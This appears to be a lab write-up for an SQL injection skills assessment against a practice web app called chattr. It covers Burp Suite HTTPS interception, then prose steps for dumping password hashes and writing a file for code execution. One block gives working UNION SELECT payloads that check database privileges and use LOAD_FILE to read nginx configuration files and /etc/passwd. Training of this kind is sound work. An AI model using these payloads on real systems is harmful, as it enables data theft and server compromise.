Skills Assessment - SQL Injection Fundamentals

Scenario

You have been contracted by chattr GmbH to conduct a penetration test of their web application. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.

They provided a target IP address and no further information about their website. Perform an assessment specifically focused on testing for SQL injection vulnerabilities on the web application from a "black box" approach.

Chattr login page with fields for username and password, login button, and a person on the phone in an office.

Intercepting HTTPS Traffic with Burp Suite

The web application in this skills assessment uses HTTPS. Burp Suite can proxy HTTPS, but the browser will reject the certificates Burp generates for each site unless it trusts Burp Suite's Certificate Authority (CA). To intercept the traffic, it is therefore necessary to either install Burp Suite's CA in your browser or use the browser integrated into Burp Suite, which already trusts it.

Option 1: Using Burp Suite's Integrated Browser (Chromium)

One way to intercept traffic to websites that use HTTPS is to use the browser integrated into Burp Suite, which is pre-configured to route through the proxy listener and to trust Burp's CA. To do so, simply navigate to the Proxy tab and click Open browser. In addition to intercepting HTTPS traffic, the integrated browser has a couple of Burp Suite's browser extensions pre-installed, such as DOM Invader, which is a useful tool for identifying DOM-based XSS.

Burp Suite showing intercepted POST request to chatr login page with username 'jsmith' and password field filled.

Option 2: Installing PortSwigger's CA in your own Browser

The other way to intercept traffic to websites that use HTTPS is to install Burp Suite's CA into your web browser of choice. PortSwigger has an article which documents the process for Chrome, Firefox, and Safari. For example, let's see how it works in Firefox.

After configuring your browser to use Burp Suite as a proxy (default listener: 127.0.0.1:8080), go to http://burpsuite. You should see the following page:

Burp Suite Community Edition welcome page with CA Certificate button.

Click on CA Certificate and save cacert.der to a known location. This is Burp Suite's CA certificate, which we need to import into Firefox so that the browser trusts the certificates the proxy generates.

Next, head over to Settings, and search for "Certificates". You will need to click on the View Certificates... button shown below:

Firefox settings search results for 'certi' with options to view certificates and security devices.

Inside the Certificate Manager dialog, open the Authorities tab and click Import. Select the cacert.der file we just downloaded, check both trust boxes, and click OK to import the CA.

Firefox Certificate Manager under Authorities tab, importing a certificate with options to trust CA for websites and email users, OK button highlighted.

We can then use the Firefox extension FoxyProxy to switch Firefox's proxy settings quickly. This extension is pre-installed in your PwnBox instance and can be installed in your own Firefox browser by visiting the Firefox Extensions Page and clicking Add to Firefox.

Once we have the extension added, we can configure the web proxy on it by clicking on its icon in Firefox's top bar and then choosing Options:

FoxyProxy menu with options for "Options," "What's My IP?" and "Log."

Once we're on the Options page, we can click on Add in the left pane, enter 127.0.0.1 as the IP address and 8080 as the port, name it Burp, and click Save:

Edit Proxy Burp/ZAP settings. Fields for title, color, proxy type, IP address, port, username, and password. Buttons for "Cancel," "Save & Add Another," "Save & Edit Patterns," and "Save."

Finally, we can click on the FoxyProxy plugin icon and select Burp:

FoxyProxy menu with Burp/ZAP enabled. Options for "Options," "What's My IP?" and "Log."

Once that's done, we should be able to intercept HTTPS traffic in Burp Suite with no issues.

Burp Suite intercepting POST request to chatr login page with username 'jsmith' and password field filled.

Note: If you are using PwnBox for the assessment, you do not need to install the Burp certificate separately, as it is pre-installed by default. Just make sure to select the BURP option on the FoxyProxy Firefox plugin.


Target: 94.237.51.160:42102

What is the password hash for the user 'admin'?

Access the target through Burp's integrated browser:

Try to create an account:

Registration requires an invitation code, and the one we supply is rejected as invalid, so let's try an SQL injection in that field. Intercept the request with Burp, send it to Repeater, and add the injection:

Now, log in at /login:

We can now access chattr and see conversations between users:

Use the search bar and intercept the request; the search term is our injection point:

Let's build our SQL injection, starting with the number of columns the query returns:

When we set the ORDER BY value to 5, we get no results:

ORDER BY 4 still works, so the query returns four columns. Now let's try a UNION injection with four columns and see which of them are reflected on the page:

Now, list the databases from information_schema.SCHEMATA:

Check the tables in the chattr database:

List the contents of the "Users" table:

Now, extract the usernames and password hashes from chattr's Users table:


What is the root path of the web application?

Check our database user and its privileges:

Our user holds the FILE privilege, which permits LOAD_FILE() and SELECT ... INTO OUTFILE. So let's try to read the web server's configuration file to find the application's root path.

After trying the default configuration paths of the common web servers, we conclude that the target serves the application with nginx; the root directive in its server block gives the web application's root path:
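Checking the privileges and reading the server configuration, as an added example rather than the write-up's own requests. It assumes MySQL or MariaDB, a four-column query with the search term inside a single-quoted string (as established earlier in the assessment), and nginx installed at its Debian/Ubuntu default paths; those paths are guesses until a file actually comes back.

```sql
-- Added example: FILE privilege check and configuration read via LOAD_FILE().
-- Assumptions: MySQL/MariaDB, four reflected columns, nginx at its default
-- Debian/Ubuntu configuration paths.

-- 1. Privileges of the application's database account. FILE is what we need.
' UNION SELECT 1,GRANTEE,PRIVILEGE_TYPE,IS_GRANTABLE FROM information_schema.USER_PRIVILEGES-- -

-- 2. secure_file_priv decides whether FILE is usable at all: NULL disables
--    LOAD_FILE and INTO OUTFILE, a directory restricts both to that directory,
--    and an empty string leaves them unrestricted.
' UNION SELECT 1,@@secure_file_priv,@@datadir,4-- -

-- 3. Read the web server configuration. LOAD_FILE returns NULL when the file
--    does not exist, is not readable by the mysql OS user, or lies outside
--    secure_file_priv, so a NULL does not tell you which of the three it was.
--    Trying each common server's default paths in turn is how the write-up
--    narrows this down to nginx.
' UNION SELECT 1,LOAD_FILE('/etc/nginx/nginx.conf'),3,4-- -
' UNION SELECT 1,LOAD_FILE('/etc/nginx/sites-enabled/default'),3,4-- -

-- 4. The root directive in the server block is the application's root path.
--    Wrap the content in TO_BASE64() when the page mangles newlines or drops
--    characters it treats as HTML.
' UNION SELECT 1,TO_BASE64(LOAD_FILE('/etc/nginx/sites-enabled/default')),3,4-- -
```

Reading /etc/passwd first is a cheap way to confirm LOAD_FILE works before hunting for configuration files, since a NULL on a file you know exists points at secure_file_priv or filesystem permissions rather than a wrong path.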


Achieve remote code execution, and submit the contents of /flag_XXXXXX.txt below.

Now, try to write a file into the web application's root path:

Check that the file was written and is served by the web server:

Now, get the flag:

